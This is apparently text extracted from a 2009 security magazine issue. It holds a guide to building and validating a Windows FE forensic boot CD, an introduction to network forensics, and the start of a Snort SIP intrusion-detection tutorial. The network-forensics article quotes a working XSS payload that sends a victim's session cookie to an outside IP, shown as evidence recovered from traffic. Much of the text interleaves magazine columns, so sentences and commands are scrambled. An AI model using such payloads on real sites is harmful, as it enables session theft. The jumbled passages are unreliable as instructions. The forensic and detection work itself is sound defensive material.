14 HAKIN9 6/2009
WINDOWS FE

Defining the Need for a


Forensic Boot CD
During an Incident Response or a
Forensic Search and Seizure we might
be confronted with situations in which
it is either not possible or advisable
to remove the hard disk drives from
the PC-cases. For example think of a
new system with warranty – breaking
the seals will void the warranty. Or
think of a server with some type of
RAID-controller – imaging each hard
drive separately and afterwards
reconstructing the RAID-array in the
lab can be very demanding. Lots of
other situations are imaginable that
emphasize the need for a (forensic)
Boot-CD for the acquisition of dead
systems. That is what I will cover in this
paper. In such situations the use of a
forensic boot CD might be a solution to
Figure 1. WAIK installation get a forensic image for a first triage.
Consequently I will not discuss the
Pros and Cons of using a USB-drive on
a potentially compromised system like
it is done with Microsoft’s COFFEE. We
all know that this operation will lead to
changes in the systems registry – next to
an entry for the USB device; all running
programs are logged and of course will
change the contents of the systems RAM.
The same is true for running programs
from a Live CD.
Booting a dead system from a
forensically sound CD will leave the
system unaffected – if the CD-system
fulfills the following requirements:

• they must not alter the disc(s) of the


system (that means, any sort of write
access is strictly prohibited),
• the creation of forensic sound copies
on other media must be possible.

Until now only Linux and UNIX-based boot


CDs (for example HELIX or SPADA) had
the ability to mount devices in Read-Only
mode. This is a reliable feature because it
is implemented in the operating systems
kernel. Additionally Linux and UNIX
already have lots of powerful programs
for the copying and examination of disks
and systems aboard.
The only known exception
Figure 2. PE-base directory is SAFE from ForensicSoft Inc.,

6/2009 HAKIN9 15
BASICS
(www.forensicsoft.com). This is a My personal estimation regarding for exotic hardware. Linux still has only
commercially available version of a any forensic software is that you, the user, limited support for certain types of RAID
somehow modified version of Windows should be able to validate its functions by controllers (for example the ones made
and a graphical front-end. It promises yourself and explain to some level how by DELL or HighPoint), some types of
to be forensically sound but I found no and why it works. video cards (especially onboard-models)
detailed description in what way this and often the ACPI-functions of some
product achieves this. According to the A Windows-based motherboards.
documentation it incorporates a software Bootable CD For me such a CD has another
write-blocker similar to the separately sold The advantage of a Windows-based advantage. Most forensic examinations
SAFE Block XP. boot CD is the very good support; even are performed with one of the big tools,
for example EnCase, Forensic Tool Kit or
X-Ways. With a Windows-based boot-CD I
can add those tools and at least use their
forensic imaging-capabilities. This does
not mean that I am too stupid to perform
a forensic imaging procedure with Linux-
tools. But imagine the situation – you are
under pressure and you just have one
single chance to acquire a system. You
are better off with a tool you know, that is
validated and that is easy to use (yes – I
mean using point and click).
Up to and including Windows XP /
Windows Server 2003, Windows had no
built-in option for a read only access to
disks (apart from a registry entry for USB
devices). Naturally this prohibits the use
of Windows as a basis for a forensic
boot CD. The well known Bart PE is,
therefore, entirely inappropriate for forensic
purposes!
With Vista / Server 2008, Microsoft
realized this feature which has been so
far only a Linux / UNIX capability. This
opened the door for a Windows-based
Figure 3. PE mount with GimageX
forensic boot CD. Windows FE is, simply
described, just a slightly modified version
of a Windows Vista-based PE. It differs only
in two modifications of the registry as well
as the addition of forensic tools.
For our purposes the relevant system
services are the Partition Manager and
the Mount Manager. Microsoft explains
the functions of the two services as
follows. The mount manager performs
inter alia, the mounting of new data-
drives into the system. By changing the
registry key NoAutoMount this automatic
mounting can be switched off. The
partition manager has a similar task – it
also mounts disks of SAN's (Storage
Attached Network) to the system. By
changing the registry key SAN Policy this
will affect whether and how the disks
Figure 4. Modification of the registry will be connected. To perform a forensic

16 HAKIN9 6/2009
WINDOWS FE

copying we need to mount our target- \mounted-CD will mount the CD- Partition Manager and the Mount
drive in Read/Write-mode manually with image (more precisely, the first partition Manager distinguish a FE CD from a
the program diskpart . of the image-file) to the directory D: normal PE CD!
\mounted-CD with write / read access. On our PC we start regedit . Then
A Few Steps to a Windows Alternatively, there is a nice utility with we load an additional structure under
Forensic CD... a GUI – GImageX, which is available at the HKEY LOCAL MACHINE (HKLM) with
As a basis we need a PC with Windows www.autoitscript.com/gimagex/ (see the function Load Hive. Next we add the
Vista (or Server 2008) installed. Windows Figure 3). registry tree of Windows PE which can be
7 should also work, however I haven’t found under D:\mounted-CD\windows\
tested it. Additionally an installation of the Modifying the Registry system32\config\SYSTEM.
Automated Installation Kit (AIK) for Vista / The next step is to implement the The structure must be loaded; then we
Server 2008 is required. necessary changes in the registry that give it an appropriate name to handle it
The download-address of AIK for prevent the automatic mounting of all – we simply call it FE (see Figure 4).
Vista or an alternative version that is also attached drives. We now open the path \FE\
suitable for Server 2008 (and Windows 7) As mentioned before only the CurrentControlSet001\Services\
can be found at Microsoft’s webpage. changes of two registry keys for the MountMgr\. Here we change the value
After installing the AIK we will recognize
a new menu item that opens the PE Tools
Command (see Figure 1).
After starting the PE Tools Command
a simple DOS-window will pop-up
– unfortunately there is no nice GUI
available.

Creating the Base System


As a first step, we have to create the basic
folder with all the files needed to create a
bootable CD. To do this, at the PE Tools
prompt we give the command

copype.cmd x86 d:\FE-CD

All files necessary for the preparation of


a Windows PE (x86 architecture) are now
copied to the directory FE-CD on drive D:\
(see Figure 2).
The entire sub-directory can be
copied without any problems to another
Figure 5. The MountMgr registry entry
Windows-system. We only need the
base-folder and the Deployment Tools
installed (and working) to prepare our
Windows FE.
The folder now contains some special
files and an image-file of a miniaturized
Windows system. Typically for Microsoft
the image-file is in a special format – the
Windows Image-format (files have the
ending .wim).
To edit it (i.e., to copy our tools to it and
to perform the changes of the registry),
this CD-image has to be mounted. We
are still working at the PE Tools command
prompt.
The command imagex.exe /
mountrw d:\FE-CD\winpe.wim 1 d: Figure 6. The registry entry of the partmgr

6/2009 HAKIN9 17
BASICS
of the DWord NoAutoMount from 0 to 1. the Partition Manager-key. The key SanPolicy must have a value of 3 (see
Perhaps this DWord must be created. SanPolicy can be found at \FE \ Figure 6). That's it – to finalize our work
This depends on the base system (Vista, CurrentControlSet001\Services\partmgr. we must remove the structure and thus
Server or Windows 7) and the version of As mentioned before, again it depends the changes are saved. It is necessary to
the Automated Installation Kit that was if this key and the DWord already exists. If keep the CD image mounted for the next
used (see Figure 5). necessary we have to create this entry. To steps.
The next step will be to change do this we create a new key Parameters,
the value of the DWord SanPolicy of next a DWord SanPolicy. The DWord Adding Forensic Tools
Until now we only created the base for a
forensic boot CD. In order to be able to
work with this CD we have to add some
nice programs.
It is important to note that the
Windows PE has a simplified system
structure, which does not allow a normal
installation of programs. Therefore we
will use programs that do not need to
be installed. Depending on the software
additional needed libraries must be either
in the program's folder or copied to the
system32 folder.

Recommended Tools
The following tools are available at no
charge and are free, at least for personal
use. Unfortunately the copyright of all
tools do not allow including them on the
accompanying CD.
This is rather a personal assortment
based on personal practice and it is not
Figure 7. Running FTK under FE
intended to foster certain companies or
persons.

• AccessData FTK Imager


(www.accessdata.com/downloads/
current_releases/imager/imager_
2.5.4_lite.zip) Remark: In the unzipped
package there are several .dll files,
but we must copy an oledlg.dll to the
FE-directory windows\ system32\ for
proper function of the imager (see
Figure 7).
• ProDiscover Basic (www.toorco
n.techpathways.com/uploads/
ProDiscoverBasicU3.zip) Remark: The
package can be unzipped after the .u3
ending is changed to .zip. The folder
contains all needed libraries and the
executable files and can copied as-is
to the root directory of our FE
• Forensic Acquisition Utilities
by George M. Garner Jr. (http:
//gmgsystemsinc.com/fau) Contains
UNIX classics like dd, nc (netcat) and an
Figure 8. TestDisk under FE implementation of wipe for deleting data

18 HAKIN9 6/2009
WINDOWS FE

• TestDisk by Christophe Grenier Now we can transform our .wim file to This program works with the folder
(www.cgsecurity.org/wiki/TestDisk) (see a bootable CD image. To do this we use structure as it was created by the
Figure 8) the program oscdimg of the Deployment copype.cmd script. The image-file for
• The webpage of Werner Rumpeltesz, Tools. the CD is expected in the folder ISO\
(http://www.gaijin.at/en) is definitely
worth a look. Amongst others you can
find lots of useful tools like Registry
Report , Registry Viewer and System
Report with which you can create
registry extracts respectively complete
system descriptions. Historian from the
same author can be used to analyze
history files of Internet Explorer, Firefox
and Opera (see Figure 9).
• Another highly recommendable
website is MiTeC from Michal Mutl
(www.mitec.cz). A good program
package that was tested with FE is
Windows File Analyzer. It contains
a Thumbnail Database Analyzer,
a Prefetch Analyzer, a Shortcut
Analyzer, an Index.dat Analyzer and
last but not least a Recycle Bin
Analyzer.

In principle, any stand-alone program


should work under a Windows FE-
environment. Also most of the U3
installation packages can be used as
they contain executables together with
all necessary libraries. However, your
own testing and validation is needed
to find out the special requirements
Figure 9. Working with RegistryReport on FE
of a particular program. To analyze
which libraries are needed by a certain
program I recommend Dependency
Walker (can be found at www.dependenc
ywalker.com).

Creating a Bootable CD Image


Once we have modified the registry and
copied our programs we are ready to
create the CD image. Under the PE Tools
command we type in:

imagex.exe /unmount /commit d:


\mounted-CD

The option /commit indicates ImageX


to write back all changes made to the
mounted image-file.
If we used CImageX to mount the
image-file, we must set a checkmark at
Commit Changes and then click Unmount
(see Figure 10). Figure 10. Unmount the FE images with GimageX

6/2009 HAKIN9 19
BASICS
Sources as boot.wim. That is why we need The option -b selects the boot sector file The RAM disk appears after starting
to rename our winpe.wim to boot.wim (to make the CD bootable), followed by with the drive letter X:\.
and move it to the folder ISO\Sources the path to the source directory where the
afterwards. There is already a backup boot.wim resides. Next we have the path Testing the CD Images and
of the original boot.wim that can be where and under what name the ISO file Creating a CD
overwritten. will be written. The option -n allows long file For testing, we can boot the ISO image
Then we delete the file bootfix.bin names and -o gives some compression with virtualization programs such as the
from the folder ISO\boot\. This file is (see Figure 11). Virtual PC from Microsoft or the freeware
used to create a 10-second countdown Interestingly the finished ISO image Virtual Box.
prior the starting of the boot-process contains an approximately 170 – 200 The Windows FE should boot and
from CD, asking to hit a key if we want MByte large boot.wim and a boot eventually a DOS-like window should
to boot from CD or not. This countdown loader file. The boot.wim contains a appear together with the original
can be fatal – if we miss it accidentally, slightly condensed NTFS-formatted Vista background. That is our working
the system will boot from its system system director y. When booting from environment (see Figure 12).
drive what will do lots of unacceptable CD this system director y will be copied After successful testing, we can burn
alterations. to a RAM disk with a size of 256MByte. the ISO file with a CD-burning program
From the PE Tools command-prompt This RAM-disk will then be used as to a CD-R (for example with the function
we now start the conversion: our system drive. Thus Windows FE Burn Image to Disk from Nero Burning
only starts on systems with at least ROM ).
oscdimg –n –o –bD:\FE-CD\etfsboot.com 512MByte RAM – 256MByte for the Now it’s time to test our CD on a real
D:\FE-CD\ISO D: RAM-Disk plus at least 256MByte for system.
\FE-CD\WinFE.iso execution.
Using Windows FE
During our first test of the Windows
FE we have noticed that our working
environment is a DOS window within
a graphical environment. Although the
mouse can be used, there are no icons
to start programs. All commands must
be entered via the keyboard. To become
familiar we first look at the contents of
the Windows-system directory with the
command dir.
Next we type twice the command
dir .. and get to the root directory X:\.
From here we can switch to the folders
of our added programs. Now it would
be nice to find out what other drives
are connected to our system. Until now
we just recognized our system drive X:\
which is just a RAM disk, not a physical
drive.

Show Information About


Disk Drives
We use the program diskpart to show
which drives are attached and are
recognized by the system. We start by
entering diskpart at the command
prompt. We will get a new command
prompt DISKPART>. With list disk we
can see all available disk drives. If a
disk is connected thereafter, we use the
command rescan and subsequently
Figure 11. Creating the ISO file these drives are also listed.

20 HAKIN9 6/2009
WINDOWS FE

Mounting Drives With Read/ But before we use our self-made If Windows FE will write disk-signatures
Write Access Enabled CD in a real incident we must test its automatically we will run into trouble.
To create a backup, we need write forensic suitability. That means that our To understand the possible
permissions for the target device. We look CD must not allow any write access and problems we have to recapitulate how
for our drive’s ID as shown by list disk (e.g. must not write to the disks during the we can prove that a copy is bit-identical
1), then we select it for further processing boot process and thereafter. It should and therefore a forensically sound copy.
with select disk 1. The command allow write-access only to explicitly A hash-value, regardless which method
attributes disk clear readonly mounted disks. is used, will tell us just one thing – if the
removes the read only-attribute from As a generally accepted procedure copy is bit-identical or not. If two hash-
the disk. Next we have to unlock the we will calculate a checksum of a test- values do not match, we only know that
target partition. With the command list system before and after having booted something is different. We can not tell
volumes we list the available partitions it with the CD. Therefore we use the so what and how much was changed, when
of our target disk. With select volum e called avalanche effect of checksum it was changed or how it was changed.
followed by the number of the desired algorithms like the md5 or sha1. The If our FE writes a disk-signature it would
partition and finally attributes volume avalanche effect means that even alter just four bytes. Anyway that would
clear readonly we set the partition in the change of a single bit significantly change the disks hash-value.
read/write-mode. changes the checksum. Troy Larson commented on this
In order to have normal access, problem that Windows FE will write a
we must give our partition a drive letter The Problem of Disk disk signature to a non-Windows disk,
(e.g. D) with the command: assign Signatures ie. any disk that doesn't have a disk
letter=D . Objections to the suitability of the signature.
It must be expressively stated that in Windows-based FE are based on the He states: This is a well documented
consequence of these steps the operating fact that Windows writes a signature to a behavior of Windows, and, as such, is
system will write data to the hard drive. hard disk when it is added to the system predictable. As predictable, the behavior
Therefore these commands should only be and was initialized. Disk signatures are can be expected and explained by the
performed on a target drive (see Figure 13). used by Windows to uniquely identify a forensic investigator.
disk, regardless of the assigned drive Additionally I found a comment
Network Connection letter. The signature is a four-byte entry by DC1743 (the author of forensicsfr
To use our system in a network without to be found in the Master Boot Record omthesausagefactory.blogspot.com)
a DHCP, we can manually set the IP (MBR) at offset 0x01B8. It can be read out who describes that FE (better said the
address: with the tool DumpCfg from the Windows program diskpart ) not only writes a disk
Resource Kit. signature but also set a read-only-byte. If
netsh int ip set address local static
192.168.0.123
255.255.255.0

Restart and Shutdown


To shut down or restart our system we can
simply switch the system off. But its more
elegant to use the program wpeutil. The
command wpeutil reboot will reboot
the system, while wpeutil shutdown will
shut it down.

Forensic Validation
A forensic boot-CD in the hands of an
experienced administrator gives him
the ability to respond to incidents and
to perform the necessary backup of all
potentially affected systems by himself.
With the appropriate use of forensic
tools on the affected systems an admin
can do a first assessment to decide if a
full investigation by a forensic examiner
is necessary. Figure 12. FE started

6/2009 HAKIN9 21
BASICS
this was true we would already have two First we will calculate the md5-checksums • Checksums after mounting with
changes on our evidence. of the three disks before booting with FE. diskpart and setting volume in Read/
Maybe we know why and where our Then we will calculate checksums of Write-mode
evidence was changed, but we will be the disk under the FE-environment (e.g. • Disk 1 – Mounting and setting in
in the unhappy situation that we have with FTK-Imager) before and after the Read/Write-mode of both disk
altered the evidence. We will have to disks were mounted with diskpart . and volume worked, checksum
explain this continuously and surely at Lastly we will create checksums of the changed to 0988 […] 462a !! (See
court the defendant will ask Can you disks after a reboot. Figure 15)
prove this? or even worse If you altered The tests were conducted on an • Disk 2 – diskpart – Select Disk
this data on the evidence, what else was old dual PIII-system with an U160-SCSI gave error message Disk not
changed? controller. The disks were 9GB and 18GB initialized, diskpart – attributes
At this point I decided to perform SCSI-drives. disk clear readonly only resulted
some in-depth test with Windows FE to find The md5-checksum consists of 32 in an info message; no change of
out what really happens. hexadecimal values, for easier reading I checksum happened.
abbreviated the checksums to the first and • Disk 3 – same results as with
Test Scenarios and Results last four hex-values. ext2-disk – also no change of
The objective of these tests is to show how checksum.
Windows FE handles different types of • Checksums before booting FE – The • Checksums thereafter – The
hard disks. hash-values were calculated under checksums were calculated
It will be tested if and where FE writes Linux with md5sum : (see Figure 14) again after rebooting into a Linux-
to: • Disk 1 had “d527 […] a932”, system. This was done to verify
• Disk 2 “9f36 […] 38af” the correctness of FTK-Imagers’
• Disk 1 – a NTFS-formatted disk • Disk 3 “e4cb […] 74ad”. checksums. For Disk 1 again the new
(bootable with Windows XP Home), checksum of 0988 […] 462a was
• Disk 2 – a Linux-system disk with ext2 • Checksums after booting with FE calculated, while Disk 2 and 3 still had
– Checksums were calculated with their original values.
and FTK-Imager:
• Disk 1 had “d527 […] a932”, Examination of the
• Disk 3 – an empty disk (wiped with • Disk 2 “9f36 […] 38af” NTFS-formatted Disk
zeroes). • Disk 3 “e4cb […] 74ad”. As expected, Windows FE wrote to the
Read/Write-mounted NTFS-drive. To
verify what changes were written to the
NTFS-formatted drive I compared the
original dd-image with the image of the
altered disk. I used WinHex to open both
image-files and compared them byte-
by-byte.
I recognized three changes. The
first two were in the MBR and partition-
table of the disk (between the offsets
0x0400 and 0xA310). A rather big
modification of several kilobytes was
found in a formerly unallocated area.
Further examination revealed that these
alteration originates from the metadata
folder $RmMetadata under $Extend .
Two new subfolders $Txf and $TxfLog
have been created beneath two new
metadata-files $Repair and $Repair:
$Config . These files respectively folders
are only to be found under the NTFS-
version used by Vista (and newer),
the so-called Transactional NTFS.
Undoubtedly these files must have
Figure 13. Diskpart in action been added by the Windows FE after

22 HAKIN9 6/2009
WINDOWS FE

mounting the drive and setting it to During my tests I was not able to Anyway the most important point
Read/Write-mode. reproduce the automatic writing of is, Windows FE/diskpart will not alter
Windows FE as it was mentioned by Troy any disk by itself. You only have to use
Conclusion Larson and others. diskpart to mount the target drive. All
According to my test I would state: There were no changes neither on available tools for forensic imaging can
the NTFS-drive, the empty drive or the happily work with physical drives as their
• Windows FE will never alter hard drives ext2-formatted drive. Mounting non- source drives.
automatically regardless with which Windows formatted drives was not By comparing the checksums of the
filesystem they are formatted to, possible with diskpart , hence it could backup files we also have checked the
• Changes on hard drives can only not perform any write-operations on the proper function of the imaging software!
occur if the respective disk has disks. The result is that we successfully built
a Windows-compatible MBR and Based on my tests I can not to tell a Windows based Forensic Environment
Partition Table (either FAT or NTFS) and under what special circumstances and checked its suitability for forensic
if it was mounted manually in Read/ Larson, DC1743 and others made their usage.
Write-mode with the help of diskpart . observations. In any case the user should always
perform these tests for his self-produced
CD. The proper function must be tested
and should be documented. Think of a
small typing error, some type of change
in the programs or other factors that
might result to a CD that does not work
as expected! I already recognized some
minor differences between the various
revisions of AIK.
The user is responsible and has to
take care. Additionally, the tests are also
useful to train the usage of the CD and to
develop a routine.
As a last word I will add that this Boot
CD is definitely not the ultimate solution. I
am sure it has its hassles and will hardly
compete with the highly elaborated
Linux-based CDs. Nevertheless I think
that it is worth a look and I am sure that
Figure 14. Hash-values of the NTFS-drive before mounting with diskpart it can be a solution for some special
cases.

Marc Remmert
The author is a certified Computer Forensic Examiner.
He is also interested in IT security problems and Linux/
UNIX operating systems.
He started using computers in the late 1980s. Most
of his spare time is dedicated to his family. But if he
finds some extra time he fiddles with his slowly growing
collection of elderly computer systems.
Figure 15. Hash-values of the NTFS-drive after mounting with diskpart You can contact him by email m.remmert@arcor.de.

6/2009 HAKIN9 23
BASICS
Network Forensics:
MERVYN HENG

More Than Looking


For Cleartext
Passwords
Difficulty
Cybercriminal activities are becoming stealthier and more
creative. Insider threats are increasingly more pervasive with the
wealth of knowledge and resources available on the Internet.
Corporate defenders are more than ever faced with the grave
mission of discovering and mitigating these occurrences.

L
ogs and alerts from varied network devices traffic to be archived and the expected lifespan
(eg. Firewalls, IPS, routers) report what was of data collected. System forensics occurs on a
blocked. They do not offer Security Analysts needs basis when foul play is suspected. Only an
with sufficient data to ascertain what had taken image of a device is acquired for investigation and
place because activities that were malicious or thus less demanding from a storage standpoint.
suspicious but successful were not logged. This Network forensics is less volatile than system
makes an analyst’s job challenging when requested forensics because once you capture the network
to determine if a breach had occurred and that is traffic, the evidence does not get lost or destroyed
where digital forensics plays a crucial role. as what you experience with live systems whose
Digital forensics can be defined as the state are constantly changing.
acquisition and analysis of evidence from Activities occurring locally on a system cannot be
electronic data to discover incidents of malicious scrutinized from network packets. System forensics
or suspicious intent and correlate them with only paints a picture of the system you are examining
hackers or non-compliant employees. Sources of and does not exemplify what is happening on other
electronic data would include computer systems, systems or the rest of the network.
storage mediums, electronic files and packets Rogue parties who are careful will take pains
traversing over a network. Digital forensics is mainly to ensure that traces of their insidious actions
conducted at two layers: network and system. will be erased (eg. browser cache) or tampered
with (eg. system logs) thus rendering evidence
Network Versus System collected from the suspect system questionable.
Forensics Recorded network packets are harder to
The two forms of digital forensics adopt the same compromise if the packet sniffer is secured and/
WHAT YOU WILL approach seeking to achieve the same goals or deployed out-of-band.
LEARN... but differ in execution. System forensics involves With recorded traffic, it is possible to replay
Introduction to Network examining the bits residing on a storage device an event to observe what transpired. This is not
Forensics
(eg. hard drive, flash drive, portable disk) and possible with compromised systems unless
Sample of network evidence
the also state of the OS (eg. running processes, the malicious activity is still ongoing and would
WHAT SHOULD YOU listening ports) whilst network forensic focuses on still be monitored from the network perspective
KNOW... the events occurring over a network. To maximize as placing tools to monitor at system level may
Network, system, file and the power of network forensics, packet capture arouse the hacker’s suspicion.
application fundamentals has to be continuous and cover as much of the System forensics is more commonly
Basic packet analysis corporate network as possible. This poses a conducted because it requires fewer resources.
Attack vectors challenge cost-wise due to the sheer volume of A compromised server or workstation normally

24 HAKIN9 6/2009
NETWORK FORENSICS

has a snapshot of the system acquired the analyst that automated brute forcing attacks. Splunk can also be harnessed to
before it is quickly reinstalled so that it was launched against a system running discover trends and anomalies. Why would
can be released back to the system FTP. It was also determined that a wordlist a machine from Marketing be used to
owner. Network forensics is less frequently obtained from the Openwall Project website download a packer, anonymous proxy and
harnessed but the benefits it affords was used by the perpetrator (see Figure 2). port scanner? This hints at either an insider
are worth considering since it can who is up to no good or a hacker having
be conducted without disrupting the Anomalous Behavior control over a compromised machine (see
production environment. Anomalous behavior can be defined Figure 3).
as actions that do not fit a baseline,
Network Evidence profile or norm and cannot be identified Bypassing Security Mechanisms
The evidence that can be acquired by conventional detection techniques. URL obfuscation is a rudimentary method
from corporate traffic is limitless but is Anomalous traffic is typically a precursor to of disguising URLs by changing the
only restricted by the knowledge and
imagination of the canvasser as well as
the resources made available.

Authentication
As the article title highlights, sniffing the
network was historically employed to
audit or harvest credentials. Organizations
are strongly recommended to encrypt
all authentication but the possibility of
discovering unsecured passwords still Figure 1. Evidence of cleartext and weak passwords
exists due to improper HTTPS initiation,
poor Single Sign-On (SSO) implementation
or vendors not enabling encrypted logins
by default. ngrep (network grep) is a
pcap-aware version of the popular grep
tool. It allows forensic practitioners to
specify extended regular or hexadecimal
expressions against network packets. An
example of its use is to search for the string
PASS from FTP sessions (see Figure 1).

Attack Methodology
Networks are the transport medium for
legitimate business transactions over the
Internet as well as within the corporate
Intranet. This vehicle would also ship attacks
Figure 2. Evidence of brute forcing
against your assets and employees. Attacks
are launched against your network devices
(eg. ARP spoofing, DDOS), systems (eg.
buffer overflows, self-propagating worms)
and applications (eg. SQL injection, XSS). It is
possible to ascertain what attack vector was
exploited from dissecting network traffic.
Splunk is a powerful software that
facilitates indexing, searching and analysis
of an organization’s infrastructure data.
Logs and alerts notify enterprises of
attacks but Splunk’s flexible and efficient
search capabilities assist in furnishing
details about attacks that occurred in your
environment. When searching for failed
logins for instance, Splunk is able to inform Figure 3. Evidence of anomalous behaviour

6/2009 HAKIN9 25
BASICS
format of URLs entered into the address netifera is a dynamic tool that supports the server 0x4a.0x34.0x16.0x5b which
field of web browsers. Techniques include HTTP traffic analysis by extracting web translates to 74.52.22.91 (see Figure 4).
converting the webserver’s IP address to traffic information from packet captures. It Another common technique used to
its hexadecimal equivalent for example. arranges web statistics by hosts thus making bypass filters is file obfuscation. This is as
It is astonishingly effective against web investigating specific entities uncomplicated. simplistic as changing the file extension.
filtering technologies put into place to netifera clearly displays a HTTP GET Wireshark is famous network protocol
prevent access to unwanted IP addresses. command requesting the file u94.zip from analyzer that is capable of capturing
network packets and displaying their
contents. In this sequence of packets,
we see contradicting information being
revealed. The name of the file being
downloaded is revealed as malicious.doc
but the file begins with the bytes 0x4d0x5a
or its ASCII representation of MZ.
0x4d0x5a are the magic bytes associated
with all executable files. This is evidence
that something is awry and warrants
further investigation (see Figure 5).
If there is a need to further examine
this file, file carving would be carried out to
Figure 4. Evidence of URL obfuscation
recover the file from the network packets.
Wireshark supports the extraction of
files transmitted with its Export Selected
Packet Bytes feature. The exported
bytes can be saved and inspected with
a Hex editor (see Figure 6). If there is a
requirement for automated and batch file
extraction, it is worth noting that file carving
tools like Tcpxtract and Foremost can be
utilized to achieve that objective.

Application Layer Attacks


Legitimate websites are often insufficiently
secured and subsequently vulnerable
to hacker exploitation. It makes them a
convenient vehicle of launching attacks
against innocent victims. Malicious
Javascript attacks (eg. XSS, CSRF) are still
successful because Javascript cannot be
blocked by enterprises as this action would
Figure 5. Evidence of file obfuscation render almost all websites non-functional
while web developers are not being pro-
active in ensuring server-side input validation.
The most common application of XSS
attacks is the theft of session cookies.
The hacker needs an easy method of
exporting a victim’s session cookie without
intervention. This is done by injecting a
malicious Javascript (eg. <script>new
Image().src=http://202.172.244.36/x
ss?xss=+document.cookie;</script>)
into the HTTP GET command sent to a
legitimate server (ie. 65.61.137.117). The
resource /xss?xss= does not exist on the
Figure 6. File carving server and this inevitably writes the victim’s

26 HAKIN9 6/2009
Figure 7a. Cookie hijacking uncovered

Figure 7b. Cookie hijacking uncovered

cookie to another webserver which is other’s limitations. It provides pieces to the


presumably controlled by the perpetrator puzzle to present a complete awareness of
(ie. 202.172.244.36) (see Figures 7a, 7b). incidents that occur within your organization.
The irony of HTTPS is that it was With processors constantly becoming
designed to provision integrity to sensitive more powerful and prices of storage
sessions but is abused by hackers to cloak consistently falling, it is feasible and realistic
their menacingactivities. There is the option of to employ round-the-clock recording of
decrypting HTTPS traffic if there is suspicion corporate traffic for analysis. Commercial
of a concealed attack. It is recommended network forensics solutions are polished
that organizations only study HTTPS traffic to and complete but there are a myriad of
and from assets they own (eg. webservers, free powerful tools available to channel.
SSL VPN gateway) as a last resort. They Investing in network forensics will
must not attempt to decipher sessions close the gap that most companies suffer
associated with third parties applications from when trying to comprehend what
(eg. government portals, Internet banking is happening within their networks. There
applications) as this may constitute a privacy is more that can be done in this realm
breach in certain countries. of digital forensics. Why not incorporate
ssldump is a tool that is SSLv3/TLS- network forensics into your existing
aware and is capable of decoding HTTPS network monitoring and incident handling
connections to display application data. processes?
By providing a private key owned by the
organization, ssldump is able to uncover
the application data exchanged during
HTTPS sessions linked with the said key. The Mervyn Heng
investigator is now free to comb through the Mervyn Heng, CISSP, is a Security analyst in the
Singapore IT arm of a Japanese corporate bank. He
revealed content. maintains an Information Security blog entitled Security
Republic (http://securityrepublic.blogspot.com) where
he documents tests he conducts in his personal lab
Conclusion and information he attained from research. If you have
any comments or queries, please contact him at
Network forensics compliments system
commandrine@gmail.com.
forensics because they address each CISSP – June 2009
ATTACK
Unified
MARK RUBINO

Communications
Intrusion Detection
Using Snort
Difficulty
Network Intrusion Detection is an important part of any security
toolset. Unfortunately for the uninitiated it could be quite a challenge
to get started – how to install, what to monitor and how to read
alerts. This article is designed to provide that kick-start from
the ground up by taking the reader through the installation and
configuration of a NID system and applying intrusion detection to a
communication protocol whose use is increasing in deployments.

U
nified Communications (UC) is one of SIP provides the signaling protocol that allows
the hottest topics in the communications control and manipulation of the communication
industry. UC converges several sessions (voice, video, collaboration). SIP is
communications technologies – voice, video, also flexible enough to offer extensions into
messaging (instant and email) and collaboration the base services, allowing UC providers to
(conferencing, white board) into one seamless IP build-in additions to meet their customers’
based communication architecture. The promise needs and expectations. Given its abilities and
WHAT YOU WILL of UC is impressive, imagine being able to contact flexibility many telecommunications equipment
LEARN... anyone anywhere in the world on any device by manufacturers (Avaya, Cisco, Microsoft,
How to simplify configuration of simply using one name or number. The UC service Siemens) as well as service providers are
Snort for operation on Windows automatically knows where they are and by which basing their UC services on the SIP protocol.
platforms
means they are available to communicate in Unified Communications using SIP can
How to provide a measure
of warning of malicious SIP
real time. The UC service seamlessly detects the present a range of risks to services and
activity aimed at unified location, application, network and device through user’s as deployments increase. Voice
communications servers and
services in their infrastructure. which to make contact. communications (hardphone and softphone),
Much of the promise of UC is based on instant messaging, desktop video, collaboration
Step- by -step modifications to
the comments in the snort.conf features found in and delivered by the Session applications and mobile smart phones will
file to load and run on Windows
platforms.
Initiation Protocol (SIP) IETF RFC 3261. SIP have a SIP stack and through this access to the
supports name mapping, location, availability underlying code these applications use. To the
Procedures to consolidate
additional SIP detection rules and redirection services which are key unprepared this could open critical business
from Snocer and Sipvicious into components of UC – the ability to know where systems to malicious activity and pose security
the Snort rules.
and reach users on a global scale through hazards such as; denial of service, unauthorized
WHAT YOU SHOULD a single addressing and/or naming scheme. access and theft of service. Snort, a network
KNOW... intrusion detection system (NIDS), can provide
an early warning of malicious intent that
The OSI layer 2, layer 3 and
Layer 4 standards and operation. Note
The Snort installation presented was tested on monitors SIP activity.
A basic understanding of the
Windows 2003 Enterprise Server and Windows XP Snort is available from Sourcefire
Session Initiation Protocol (SIP)
IETF RFC 3621. Pro sp2. Newer server operating systems and XP (www.snort.org) and according to a recent Gartner
Downloading applications
Pro sp3 are expected to work if you have the proper report is a recognized leader in the field. As Snort
from the Internet and loading account access and privileges and firewalls or other has been covered in previous articles (and in the
programs on Windows intrusion detection systems are disabled
platforms. Bleeding Edge columns) the following is offered

28 HAKIN9 6/2009
UNIFIED COMMUNICATIONS INTRUSION DETECTION

as a brief refresher. Snort monitors IP as well as alternate PSTN access for


network traffic, compares it against rules, SIP phones. The numbers in front of
triggers an alert when a rule has been the devices represent the IP address
matched and captures a portion of the assigned to the LAN interfaces within the
information for further investigation. Snort UC subnet of 192.168.44.0/24. For Snort
has been selected for several reasons; it to monitor the traffic streams between
is available at no cost, its easy to setup the UC IP subnet and external (Threats)
in the NIDS role and the availability of connection requires a layer 2 / 3 switch
SIP intrusion signatures. Deployments capable of Port Mirroring. Port mirroring
can be readily retrofitted into existing replicates the transmit and receive
systems or in an emergency where IP packets from the router / switch
possible intrusions are suspected and connection to/from the UC IP subnet
Figure 2. Screen Capture 1
it can be deployed on readily available to the Snort laptop interface. This is
platforms using the Windows operating represented as the connection between Locate the section with the latest version
system. In addition to the SIP signatures the switch's 44.523 address and the port of rules available to registered users
provided by Snort two additional SIP mirroring connecting to the Snort laptop – The Official Snort Ruleset (registered
specific rule sets will be added from (see Figure 1). user release) – and Download the rules
Snocer (www.snocer.org) and Sipvicious archive. Once you have these files
(http://code.google.com/p/sipvicious) to Installing Snort you are ready to install Snort on the
increase detection of malicious activity. We begin with downloading Snort Windows platform selected to perform
before installation. Snort version 2.8.4 as the NIDS system. Start by running
Snort Test Network is referenced at the time of this writing. the Snort installer.exe. During installation
